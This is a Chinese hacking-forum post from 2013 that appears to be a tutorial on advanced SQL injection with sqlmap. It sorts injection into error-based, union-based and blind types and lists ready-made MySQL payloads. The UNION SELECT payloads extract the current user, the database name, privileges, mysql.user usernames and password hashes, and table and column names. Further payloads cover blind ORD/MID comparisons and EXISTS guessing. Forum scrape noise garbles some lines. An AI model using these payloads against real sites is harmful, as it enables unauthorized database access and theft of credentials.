找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2231|回复: 0
打印 上一主题 下一主题

sqlmap高级注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-16 20:31:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。( M( {) \7 N7 V3 a  p  L$ ^  A
6 O0 f( l# y( E' Y; L' y% Y
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
, X+ u7 q. k1 S6 w. b1 }+ y2 D3 q : A5 z. s$ |$ B  p, P) O8 X3 z7 \
分类标准        分类        备注: a' K/ P/ C/ |; j; z4 e
按字段类型        整型注入,字符型注入        ) U9 j( w1 ~, L
按出现的位置        get注入,post注入,cookie注入,http header注入        ' M7 W7 m8 s5 o9 S) B: |
然而高级注入是这样的
, _& `& N+ r9 ^9 b) A" O
: @, ^) ~% f* w高级注入分类        条件
- H1 r1 c& h" f! g4 Werror-based sql        数据库的错误回显可以返回,存在数据库,表结构( S5 u% x( o/ ^) H$ c8 w0 _
union-based sql        能够使用union,存在数据库,表结构
7 Q, M( \5 c0 sblind sql        存在注入$ u- G4 }6 J: D$ s2 R
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。6 h# [; I- ~& n- x" X4 Y) P" H! ^3 U

8 V: D# R6 j3 b& p  A5 h  O* P+ {好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火6 F% `- z5 ]5 i7 X  \# B
- e" Y, _4 k' }. d, }
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
& s% |0 [' V/ Z6 |) b* j5 S 3 j+ }1 ?( \" k  x3 }: X8 e* w
这里用mysql说明
7 J* {3 J6 J, J 1 Q4 F& D: m/ o/ R- {( \, ~
e注入坛子里很多了,请看戳我或者再戳我2 o8 D) U' o9 \/ {# J! j

9 R7 p) _' V' Lu注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
3 V- c. O7 [' R3 f: _ . y, Q5 _1 y7 o4 {$ x: h( ?
获取当前数据库用户名
1 R3 L0 o3 c* X3 l " Z9 i' O( X* B+ u( V
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
  i3 n! x# \$ z% WAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
7 k2 n% m  G6 \; c- iL, NULL#
8 L$ Z6 q5 U9 G, T1 d; M5 ]注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
, `, X+ |" b( H( f * L0 ?% O" O; [' E- n5 V$ ^6 y
获取数据库名
+ R+ t. b- O) |. I% ?
! E, y9 M* l& k# CUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#- k% C( \; q8 b2 s/ l. \! c
获取所有用户名
# j( T0 b! n- f: i- {$ v 5 O; r8 a, x' k  ^
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#% J1 q( O+ f* i# ^6 s4 O
查看当前用户权限' c9 e- a% R' h/ i2 F+ b* H

& b1 C& t. u9 j) m+ N, D( YUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
( R% R2 y- D+ [7 K2 D# w) f尝试获取密码,当然需要有能读mysql数据库的权限: i6 z* F$ @  F# n7 F+ B; H# M
6 Z, Z# h7 F6 q8 s9 J8 A. _; s
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#3 l! c: K/ [6 q+ |7 A* `6 A! o( s5 L
获取表名,limit什么的自己搞啦3 e, Q+ p& T% j: T/ R3 H! G) \
3 }, |+ Y+ n$ G' P0 @, D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
$ d+ i2 X) K- |% a获取字段名及其类型
. B( O! p  q" v* \! W* bUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
- v- R  O- Z1 g% Y* G$ ^
* A: A, S2 K+ Eb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
1 {5 y: t8 I! }' g' _6 l% @4 r. P
4 `3 b2 z, k; S' `+ Y5 u) o  ?9 e如:; C7 p6 F  ^9 X9 N9 j, T
获取当前用户名
& t' A2 m# ?4 B9 N  w4 m
5 s* D% i* g0 j( N6 xAND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116- s5 k2 O$ L# F
获取当前数据库% N9 u, ~  t: Q6 N6 X7 o
+ ^( ?6 h" s8 |# P  z+ D* K; x
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1069 H5 ^$ W6 Z5 q4 w0 n
获取表名
8 o3 M. S. s9 v$ B! Q% l
' ~1 T( S5 i! y- \5 Y9 ^3 D, W0 F& A5 iAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
9 B4 E) o- N( t1 r% f1 H获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
  u' L# n6 G  i: C* f回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
1 q- n3 f- v5 Z( `7 g爆表" y; t9 b  @3 b' g' ~# E  x& ^) h
1 M7 u* J' V" M2 ]# q1 N5 L
AND EXISTS(select * from table)- u0 G8 K& y( R) [6 k! E
爆字段
: y; L+ O* ~- u7 g! c , R( U' r& }7 m
AND EXISTS(select pwd from table)3 `2 u1 _$ O/ G: |1 `# R; w
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
# X  q: r- l) r8 ~: C
: V) X0 ]' Q9 g' J7 p本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。  w/ \7 q# Y5 t/ E- `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表